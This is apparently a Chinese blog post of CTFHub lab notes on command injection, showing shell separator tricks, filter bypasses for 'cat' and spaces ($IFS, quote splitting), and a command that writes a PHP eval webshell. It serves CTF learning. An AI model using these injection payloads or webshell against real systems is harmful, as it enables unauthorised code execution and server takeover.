CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格

已于 2022-03-28 19:04:41 修改
阅读量1w 收藏 71
点赞数 17
分类专栏: RCE CTF 文章标签: web安全
于 2022-03-28 19:03:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48799157/article/details/123800145
版权

小白一个,记录解题过程,如有错误请指正!

一、命令注入

补充知识点:

        命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。

Windows系统支持的管道符如下:

1. “|”:直接执行后面的语句。
2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。
3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。
4. “&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。

Linux系统支持的管道符如下:

1. “;”:执行完前面的语句再执行后面的语句。
2. “|”:显示后面语句的执行结果。
3. “||”:当前面的语句执行出错时,执行后面的语句。
4. “&”:两条命令都执行,如果前面的语句为假则执行执行后面的语句,前面的语句可真可假。
5. “&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。

解法一:

1.查看当前目录,发现有另一个页面,当时没太注意

 2.查看根目录,发现并没有flag,反应过来flag可能在238442225211085.php

 
3.查看238442225211085.php,并没有回显

​
127.0.0.1; cat 238442225211085.php
​

查了一下,可能是字符编码显示不出来,用base64加密形式显示

127.0.0.1; cat 238442225211085.php |base64

解法二:

补充知识点:

        输出重定向:

 1.我们可以用重定向的方法注入一个一句话木马:

127.0.0.1&echo -e "<?php @eval(\$_POST['test']);?>" > shell.php

 2.用蚁剑连接即可

二、过滤cat

1.查看当前目录

2.根据题目可以知道cat被过滤了,并不能简单的得到flag

3.使用单引号绕过 

127.0.0.1; c''at flag_2287214057241.php |base64

4.使用双引号绕过 

127.0.0.1; c""at flag_2287214057241.php |base64

5.利用Shell 特殊变量绕过

127.0.0.1; ca$@t flag_2287214057241.php|base64

 三、过滤空格

1.先看当前目录

2.根据题目可以知道空格被过滤掉了 

 3.空格可以用以下字符代替:
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS

$IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。
同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。

以下payload皆可绕过本题空格:

127.0.0.1;cat<flag_2057057213623.php|base64
127.0.0.1;cat$IFS$9flag_2057057213623.php|base64
127.0.0.1;cat${IFS}flag_2057057213623.php|base64

参考文章:

https://www.cnblogs.com/0yst3r-2046/p/12600073.html

https://www.runoob.com/linux/linux-shell-io-redirections.html

https://blog.youkuaiyun.com/Manuffer/article/details/120672448

CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2689
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
ctf_show笔记篇(web入门---php特性)
whale_waves的博客
03-02 1531
原理:当md5函数加密数组时会报错NULL,当两a和b同时都是数组时,md5(a)===md5(b)等于NULL===NULL。如果b=0那么会自己去判断a是什么进制,例如a=0x开头则是18进制,0开头则是8进制,也可以直接设置b=10进制之类的。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。
CTFhub命令注入过滤空格
manerzi的博客
10-25 872
CTFhub命令注入过滤空格
CTF 中的 rce
最新发布
yqya_的博客
04-26 1099
ctf 中对于 rce 的考察
ctfhub——命令注入
m0_75007575的博客
04-05 561
这段代码首先检查是否存在名为ip的GET参数,并且该参数的值不为空。如果满足条件,将获取GET参数ip的值赋给变量$ip。接着,创建一个空数组$m,然后通过正则表达式preg_match_all("/\//", $ip, $m)来检查$ip中是否包含斜杠/。如果$ip中包含斜杠,则直接将匹配结果存储在数组$res中。既然不能使用目录分隔符,那我们就先进入目录再去查看文件。打开控制台发现代码里面出现了flag,即通过成功。运算符都被过滤掉了,我们也可以使用;回显空白,得到flag。回显空白,得到flag。
CTFHUB-技能树-Web题-RCE(远程代码执行)-远程包含-命令注入-过滤cat
Static______的博客
07-17 382
过滤cat就是找个能代替的。
CTFHub 命令注入-过滤cat
At0m的博客
01-14 3434
CTFHub 命令注入-过滤cat 第一还是看源码,首先是肯定是过滤cat关键字,虽然看不太懂,但是才也是这样啊嘻嘻。 但是preg_match_all有三个参数,看一下,这三个参数分别是干什么的: <?php $userinfo = "Name: <b>PHP</b> <br> Title: <b>Programming Language</b>"; preg_match_all ("/<b>(.*)<\/b>/
命令注入————ctfhub过滤cat空格、目录分隔符、运算符、综合过滤练习)
热门推荐
qq_45655564的博客
05-30 1万+
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
CTF学习笔记——Include&Ping Ping Ping
Obs_cure的博客
09-20 1766
一、[ACTF2020 新生赛]Include 1.题目 2.解题步骤 点进去看了一下 根据题目猜测,应该是和php的文件包含漏洞有关…尝试了一下显示phpinfo,意料之中的失败了,看wp才了解到,这是一道伪协议的题目。然后翻了一下之前的博客,复制一下payload,成功解题。 ?file=php://filter/convert.base64-encode/resource=flag.php 3.总结 第二次做伪协议的题,只能说经验不足,辨识出来,下次遇见类似这种访问文件的题目时可以尝试。
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 967
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
CTF萌新入坑指南(web篇)(21.6.5已更新)
kingdring的博客
09-27 6166
ps:其实在写这篇入坑指南的时候内心还是十分挣扎的,毕竟大佬太多而我自己太太太太菜,然鹅我也不好拒绝温柔善良的郑童鞋的邀请,因此这篇文章只面向最最最新的萌新,各位大佬请自行忽略 前言 webctf里面占到的比重还是蛮大的,从国内有ctf赛事以来,web就一直是各 路出题人的宠儿,就比如说前段时间的某次分区赛初赛题目构成是7pwn 7web 1re 1misc,虽然在我看来这个题目分配过于偏激且离谱了,但是足以看出webctf中的重要性,线下赛pwn佬可能更加关键,不过web手对于每个队伍都是
渗透测试一些知识点
wulanlin的博客
01-04 808
1、如果提示缺少参数,如{msg:params error},可尝使用字典模糊测试构造参数,进一步攻击。 2、程序溢出,int最大值为2147483647,可尝试使用该值进行整数溢出,观察现象。 3、403,404响应不灰心,尝试使用dirsearch等工具探测目录。 4、验证码简单绕过:重复使用,万能验证码(0000,8888),空验证码,验证码可识别(可用PKAV HTTP Fuzzer工具识别等) 5、短信轰炸绕过:手机号前加+86有可能会绕过,手机号输入邮箱,邮箱处输入手机号 6、如果验证
ctfhub-命令注入
m0_62094846的博客
12-15 371
看到有Ping直接写127.0.0.1看看 可以成功,再输入命令 每个都试一次 两个文件都试过了,都没有flag 然后看看上一个文件夹 然后也一个个试了,也没用 后面的都是这样的 看wp,是在48892291724801.php里面 以后看到有点奇怪的要留心一些,可能包含了flag,然后它的回显也不一样,就是有数据出来的样子,但是没有数据,就看看源代码 ...
ctfhub 命令注入
a666666688的博客
08-05 898
因为过滤了分割符,所以flag_is_here文件夹下的文件不能直接读取。若要在表单提交处修改则需要注意,提交后删除url中的25后即可执行。如果包含了这些被禁止的字符,就将匹配结果存储在。如果不包含这些字符,就构建一个。参数,会进行进一步的正则表达式匹配检查。这段代码的主要目的是根据用户通过。函数执行,将结果存储在。注意本体在url上修改即可。参数执行相应的操作。
CTFHub | 命令注入
尼泊罗河伯的博客
06-14 1992
检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的 GET 请求,判断用户是否输入了ip 信息。如果输入了 ip 信息,则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 。
CTFHub | 过滤cat
尼泊罗河伯的博客
06-18 862
在目标 IP 输入框中输入 IP 并点击 Ping 按钮, Ping 一下试试。页面正常回显。
过滤空格ctfhub
2401_82985722的博客
04-02 724
注释过滤 /**/、/*!*/、//、#、--括号过滤 ()符号过滤 %00、%09、%20、%a0 %0a、%0b、%0c、%0d引号过滤 ' 、 "大小写过滤 大小写双关键字绕过 '+'正则表达式绕过 \s、\s*\s+ 表示匹配一个或多个空白字符,\s* 表示匹配零个或多个空白字符。
CTF刷题记录CTFHub-RCE-命令注入
m_de_g的博客
07-24 5700
** CTFHub-RCE-命令注入 ** 一、解题思路 通过输入一些指令,利用某些特定的函数进行的操作,从而达到命令执行攻击的效果。 1.无任何的过滤 因为没有任何的过滤,那么我们可以直接使用分号(;)闭合前面的语句,执行ls命令 http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls 通过执行ls命令可以看到,该目下的文件,这是linux环境下 如果是window环境下,使用命令dir查看目录文件 我
ctfhub技能树web rce 命令注入
03-29
### CTFHub 技能树 Web RCE 命令注入 练习题及解法 #### 关于RCE(远程命令执行) 远程命令执行漏洞允许攻击者通过应用程序接口向服务器发送恶意指令并获得响应。这种类型的漏洞通常发生在输入未被充分验证的情况下,使得攻击者能够利用特定的字符串来触发系统的 shell 执行功能。 在 CTFHub技能树中提到的一个典型场景是使用 Hackbar 插件配合 GET 请求传递参数 `ctfhub` 来实现文件遍历操作[^1]。此过程展示了如何通过构造特殊的 URL 参数让目标程序暴露其内部结构甚至敏感数据。 #### 实践案例分析 假设存在这样一个脆弱点:当用户访问某个页面时可以指定额外选项作为查询条件的一部分;如果开发者没有对这些外部可控变量加以过滤,则可能形成安全隐患。例如,在下面的例子中,我们尝试调用 Linux 系统自带的一些基本工具完成任务: ```bash ?cmd=ls / ``` 上述请求会返回根目录下的所有子项列表[^3]。进一步地,为了读取具体的目标文件内容,我们可以继续提交如下形式的数据包给服务端处理: ```bash ?cmd=cat flag.txt ``` 这一步骤最终实现了从远端提取到所需的标志位信息——即所谓的 “Flag”。 #### 编码实践中的防御措施 为了避免此类问题的发生,应当采取以下策略之一或者组合应用它们以增强安全性: - **白名单机制**:仅接受预定义范围内的合法值; - **转义特殊字符**:对于不可信来源的内容做适当转换以免干扰正常解析流程; - **最小权限原则**:确保运行环境只拥有刚好够用的权利而不会越界行事。 以下是基于 PHP 语言编写的一段示范代码片段用于演示安全编码方式预防潜在威胁的方法: ```php <?php // 安全版本: 使用 escapeshellarg 函数防止非法字符进入系统调用层 $command = 'echo '.escapeshellarg($_GET['input']); exec($command, $output); print_r($output); ?> ``` #### 总结 通过对实际题目解决方案的学习以及常见防护手段的研究可以帮助参赛选手更好地理解 web 应用开发过程中需要注意的安全事项,并提高解决类似挑战的能力。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值